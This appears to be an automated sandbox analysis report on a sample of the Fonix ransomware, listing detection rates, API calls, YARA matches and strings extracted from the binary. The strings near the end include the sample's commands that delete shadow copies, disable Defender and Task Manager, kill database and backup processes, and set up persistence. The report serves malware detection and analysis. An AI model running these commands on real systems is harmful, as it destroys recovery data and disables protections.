Source: 8QxrJSmRtc.exe | Virustotal: Detection: 41% | Perma Link |
Source: 8QxrJSmRtc.exe | ReversingLabs: Detection: 58% |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01408900 CryptReleaseContext,_Init_thread_footer, | 0_2_01408900 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014081C0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy, | 0_2_014081C0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014089F0 CryptGenRandom,CryptReleaseContext, | 0_2_014089F0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01408330 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext, | 0_2_01408330 |
Source: 8QxrJSmRtc.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: 8QxrJSmRtc.exe |
Source: 8QxrJSmRtc.exe | String found in binary or memory: https://code.jquery.com/jquery-latest.js |
Source: 8QxrJSmRtc.exe | String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif |
Source: 8QxrJSmRtc.exe | String found in binary or memory: https://www.who.int |
Source: Yara match | File source: 8QxrJSmRtc.exe, type: SAMPLE |
Source: Yara match | File source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: 8QxrJSmRtc.exe PID: 6768, type: MEMORY |
Source: Yara match | File source: 0.2.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.0.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 8QxrJSmRtc.exe, type: SAMPLE |
Source: Yara match | File source: 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: 8QxrJSmRtc.exe PID: 6768, type: MEMORY |
Source: Yara match | File source: 0.2.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.0.8QxrJSmRtc.exe.13b0000.0.unpack, type: UNPACKEDPE |
Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp | Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet |
Source: 8QxrJSmRtc.exe | Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet |
Source: 8QxrJSmRtc.exe, 00000000.00000000.646603344.000000000147D000.00000002.00020000.sdmp | Binary or memory string: How To Decrypt Files.hta\Help.txt |
Source: 8QxrJSmRtc.exe | Binary or memory string: How To Decrypt Files.hta\Help.txt |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0145F914 | 0_2_0145F914 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01458928 | 0_2_01458928 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0145F07C | 0_2_0145F07C |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013BE0E0 | 0_2_013BE0E0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E30E0 | 0_2_013E30E0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0146A32C | 0_2_0146A32C |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01456330 | 0_2_01456330 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014453D4 | 0_2_014453D4 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01451BDC | 0_2_01451BDC |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E1A70 | 0_2_013E1A70 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0144F2C4 | 0_2_0144F2C4 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013BCAD0 | 0_2_013BCAD0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0144F548 | 0_2_0144F548 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013B6D20 | 0_2_013B6D20 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E4D00 | 0_2_013E4D00 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013C5D40 | 0_2_013C5D40 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E4580 | 0_2_013E4580 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014094C0 | 0_2_014094C0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0145DCC4 | 0_2_0145DCC4 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013B84A0 | 0_2_013B84A0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013B13F0 | 0_2_013B13F0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013B5CD0 | 0_2_013B5CD0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013E2700 | 0_2_013E2700 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_013C0F80 | 0_2_013C0F80 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_0144F7B0 | 0_2_0144F7B0 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014597B8 | 0_2_014597B8 |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_014556B4 | 0_2_014556B4 |
Source: classification engine | Classification label: mal84.rans.evad.winEXE@1/0@0/0 |
Source: 8QxrJSmRtc.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: 8QxrJSmRtc.exe | Virustotal: Detection: 41% |
Source: 8QxrJSmRtc.exe | ReversingLabs: Detection: 58% |
Source: 8QxrJSmRtc.exe | Static file information: File size 1266176 > 1048576 |
Source: 8QxrJSmRtc.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: 8QxrJSmRtc.exe |
Source: 8QxrJSmRtc.exe | Static PE information: section name: _RDATA |
Source: C:\Users\user\Desktop\8QxrJSmRtc.exe | Code function: 0_2_01421020 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_01421020 |
Source: 8QxrJSmRtc.exe | Binary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EX |